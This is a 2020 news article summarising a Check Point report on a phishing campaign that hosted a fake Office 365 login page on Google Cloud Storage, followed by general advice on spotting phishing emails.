Threat Actors Exploited Google Clouds to Launch Phishing Attacks

Actors Exploited Google

21 August 2020, Kathmandu

Sometimes we are unable to comprehend the advancement the world is making in terms of digital transformation. And those moments when we choose to ignore the threats that come with it, it is often too late. A report from Check Point Research stated a phishing attack that exploited Google Cloud.

Yes! The clouds may not be the safest place, after all.

Threat actors were found exploiting Google Cloud to host malicious payloads and launch phishing attacks.

Google may have dealt with this vulnerability, but it is up to us to stay vigilant and protect our data. In this article, we will also be discussing some ways how you can do that, especially on cloud services.

Let’s break down the Google Cloud Phishing Journey.

How did it Happen?

First, threat actors uploaded a PDF to Google Drive. They disguised the PDF to resemble a Microsoft SharePoint notice, but in reality, it contained a link to an MS Access Document.

actors uploaded a PDF to Google Drive
Image: Check Point

Once clicked, the link redirected the user to a phishing page hosted on storage.googleapis[.]com/asharepoint-unwearied-439052791/index.html.

The phishing page would then prompt the user to login with their Office 365 or organization email and password.

After the user would enter the login credentials, the page redirected to a real PDF report published by a renowned global consulting firm.

And, that’s the trick! Users wouldn’t be suspicious even for a second because they would think that they were viewing something useful.

Also, because the phishing page is hosted on Google Cloud Storage.

It is also difficult for security professionals to identify or detect such phishing campaigns for the same reason.

However, viewing the phishing page’s source code has revealed that most of the resources are loaded from a website that belongs to the attackers, prvtsmtp[.]com:”, the report stated.

page hosted on Google Cloud Storage

After further investigation of the website, researchers came to know that it was resolved to a Ukrainian IP address.

What Next?

Well, Google has a zero-day tolerance policy. So, it immediately suspended the phishing URL and all those associated with it.

There are also some incidents in the past where threat actors would host phishing pages using Dropbox and Microsoft Azure.

Also Read: Cyber Criminals Attention Shifting On ‘Email Phishing’

How To Prevent Such Phishing Attacks?

Check Point also suggested some precautionary measures to protect users against such phishing attacks.

Have a look at the following points:

  • Beware of lookalike domains and spelling errors. Unfamiliar email senders and spelling errors are a straight giveaway.
  • Take caution opening or downloading files received via email from unknown senders. Try to make sense of any suspicious call-to-action and subject line.
  • Ensure that you order products/services from an authentic source. One way to do that could be NOT clicking on promotional links in emails. Try to Google the desired service instead.
  • Beware of ‘special’ offers that could be nothing but a scam. For instance, ‘an exclusive cure for coronavirus for $150’. That should be a dead giveaway.
  • Try to keep separate passwords between different applications and accounts.

As they say, “Users’ mailboxes are the front door into your organization.”

Email security has become a necessity, which needs proper attention in organization architecture.

How often do you come across such potential scams or suspicious emails?

Do let us know in the comments!

Recommended Reads:


Please enter your comment!
Please enter your name here